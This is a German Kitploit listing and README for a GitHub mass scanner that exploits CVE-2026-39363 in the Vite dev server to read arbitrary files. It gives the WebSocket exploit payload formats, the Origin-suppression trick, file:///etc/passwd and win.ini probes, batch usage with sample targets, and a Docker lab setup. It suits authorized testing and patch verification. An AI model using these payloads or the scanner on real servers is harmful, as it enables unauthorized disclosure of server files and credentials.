Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-39363 — Batch-Schwachstellenscanner für CVE-2026-39363 im Vite-Entwicklungsserver, der die Umgehung der WebSocket-Origin-Validierung ausnutzt, um über fetchModule mit dem file://-Protokoll beliebige Dateien zu lesen. | Kitploit
Tools/GitHubGitHub/f4s1on/cve-2026-39363
SchwachstellenscannerExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

Batch-Schwachstellenscanner für CVE-2026-39363 im Vite-Entwicklungsserver, der die Umgehung der WebSocket-Origin-Validierung ausnutzt, um über fetchModule mit dem file://-Protokoll beliebige Dateien zu lesen.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-39363 — Vite Dev Server WebSocket Beliebige Datei-Lesen Massen-Scanner

Haftungsausschluss: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungsforschung bestimmt. Benutzer müssen die lokalen Gesetze und Vorschriften einhalten. Das Scannen oder Angreifen fremder Systeme ohne Autorisierung ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch.

Schwachstellenbeschreibung

Der HMR-WebSocket des Vite-Entwicklungsservers (6.0.0 ~ 6.4.1, 7.0.0 ~ 7.3.1, 8.0.0 ~ 8.0.4) validiert den Origin-Header nicht. Angreifer können über das vite:invoke-Event fetchModule aufrufen und mit dem file://-Protokoll in Kombination mit dem ?raw-Parameter die server.fs.allow-Beschränkung umgehen, um beliebige Dateien auf dem Server zu lesen.

Erkennungsablauf

root@kitploit:~
url.txt → http://host:port
  ↓ host + port parsen
  ↓
┌─ Schritt 1: ws://host:angegebener Port versuchen
│  ├─ WebSocket-Handshake erfolgreich + Exploit erfolgreich → Schwachstelle vorhanden
│  └─ Fehlgeschlagen → Wenn angegebener Port == 5173 → keine Schwachstelle
│
└─ Schritt 3: host:5173 untersuchen (nur wenn angegebener Port ≠ 5173)
   ├─ Port geschlossen → keine Schwachstelle
   └─ Port offen → WebSocket-Handshake + Exploit auf 5173
        ├─ Erfolgreich → Schwachstelle vorhanden
        └─ Fehlgeschlagen → keine Schwachstelle

Verwendung

Abhängigkeiten installieren

root@kitploit:~
pip install -r requirements.txt

Proxy aktivieren und deaktivieren

Zum Aktivieren des Proxys die Kommentare in den Zeilen 26-27 des Skripts entfernen

root@kitploit:~
# Zum Aktivieren des Proxys die folgenden zwei Zeilen auskommentieren und die korrekte Proxy-Adresse und den Port setzen
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

Ziele vorbereiten

Die Ziel-URLs in url.txt schreiben, eine pro Zeile:

root@kitploit:~
http://192.168.1.100:5173
http://example.com
http://target.cn:8080

Ausführen

root@kitploit:~
python cve_2026_39363.py

Ausgabe

Terminal:

root@kitploit:~
[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt:

root@kitploit:~
http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

Jede Zeile enthält den POC-Typ (Linux / Windows), der die Merkmale der erfolgreich gelesenen Datei kennzeichnet.

POC-Validierungsdateien

ZielsystemGelesene DateiMerkmalsmarker
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Exploit-Payload

Zwei Payload-Formate werden unterstützt (der Reihe nach versucht):

  1. Vulhub-PoC-Format: {"id":"send:0","name":"fetchModule","data":[file_path]}
  2. Internes RPC-Format: {"fn":"fetchModule","args":[file_path]}

WebSocket-Schlüsselparameter

ParameterWertGrund
Unterprotokollvite-hmrAnforderung des Vite-HMR-WebSockets
OriginUnterdrückt (suppress_origin=True)Vite lehnt Nicht-Browser-Verbindungen mit Origin-Header ab

Docker-Schwachstellenumgebung testen

root@kitploit:~
# Starten
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# Scannen
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# Aufräumen
docker stop vite-vuln && docker rm vite-vuln

Häufige Fragen

F: Alle Erkennungen geben "keine Schwachstelle" zurück?

  • Prüfen, ob der Zielport 5173 geöffnet ist
  • Sicherstellen, dass der Vite-Dev-Server mit --host oder server.host im Netzwerk exponiert ist
  • Sicherstellen, dass WebSocket nicht über server.ws: false deaktiviert ist

F: Ausgabe unter Windows zeigt Zeichensalat?

  • Das Skript verarbeitet dies automatisch. Falls weiterhin Probleme auftreten, sicherstellen, dass das Terminal UTF-8-kodiert ist

F: Die von PowerShell generierte url.txt kann nicht geparst werden?

  • Das Skript überspringt die BOM automatisch mit utf-8-sig
Tool herunterladen